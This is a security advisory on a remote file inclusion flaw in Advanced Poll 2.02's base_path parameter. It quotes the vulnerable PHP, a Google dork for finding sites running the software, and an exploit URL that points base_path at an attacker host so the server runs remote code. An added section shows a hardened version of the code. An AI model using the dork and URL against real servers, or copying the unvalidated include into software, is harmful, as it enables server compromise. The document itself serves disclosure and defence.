
SolpotCrew Advisory #2 - Advanced Poll ver 2.02 (base_path) Remote File Inclusion



#############################SolpotCrew Community################################
#
# Advanced Poll ver 2.02 (base_path) Remote File Inclusion
#
# Vendor site : http://www.proxy2.de/scripts.php
#
#################################################################################
#
#
# Bug Found By : Solpot a.k.a (k. Hasibuan)
#
# contact: chris_hasibuan@yahoo.com
#
# Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt
#
################################################################################
#
#
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
Input passed to the "base_path" parameter is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

Code from /admin/common.inc.php:

$pollvars['SELF'] = basename($PHP_SELF);
// $base_path comes from user input and is never validated before the include
if (file_exists("$base_path/lang/$pollvars[lang]")) {
    include ("$base_path/lang/$pollvars[lang]");
} else {
    include ("$base_path/lang/english.php");
}

google dork : inurl:comments.php?action= send id

EXPLOIT :

http://somehost/[path_advanced_poll]/admin/common.inc.php?base_path=http://attacker

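The vulnerable pattern beside a hardened version, as an added example written for this page rather than code from the advisory or the Advanced Poll project; the attacker.invalid host, the POLL_BASE_PATH constant, the directory layout and the language whitelist are assumptions:

```php
<?php
// Added example, not from the advisory or Advanced Poll. Names other than
// $base_path and $pollvars['lang'] are assumed.

// --- Vulnerable pattern (the advisory's code, wrapped in a function) ---
// With register_globals enabled, a request to
//   admin/common.inc.php?base_path=http://attacker.invalid
// populates $base_path before this runs. file_exists() cannot stat an
// http:// URL and returns false, so the else branch includes
// http://attacker.invalid/lang/english.php and PHP executes the response.
function vulnerable_include(array $pollvars)
{
    global $base_path;                      // request-controlled, never validated
    if (file_exists("$base_path/lang/$pollvars[lang]")) {
        include "$base_path/lang/$pollvars[lang]";
    } else {
        include "$base_path/lang/english.php";
    }
}

// --- Hardened version ---
// The install path is a fixed constant, so no request value reaches the
// include, and the language file is chosen from a whitelist, which also
// keeps $pollvars['lang'] from steering the path.
define('POLL_BASE_PATH', dirname(__DIR__));   // assumed: admin/ sits one level below the app root

function safe_include_lang(string $requested): string
{
    $allowed = ['english.php', 'german.php'];   // assumed list; build it from the shipped files
    $lang = in_array($requested, $allowed, true) ? $requested : 'english.php';
    $file = POLL_BASE_PATH . '/lang/' . $lang;
    if (!is_file($file)) {
        $file = POLL_BASE_PATH . '/lang/english.php';
    }
    include $file;
    return $file;   // lets callers log or verify which local file was loaded
}
```

Setting allow_url_fopen/allow_url_include to Off in php.ini blocks the remote include but not inclusion of local files through the same unvalidated parameter, so the code fix is still needed.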
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################
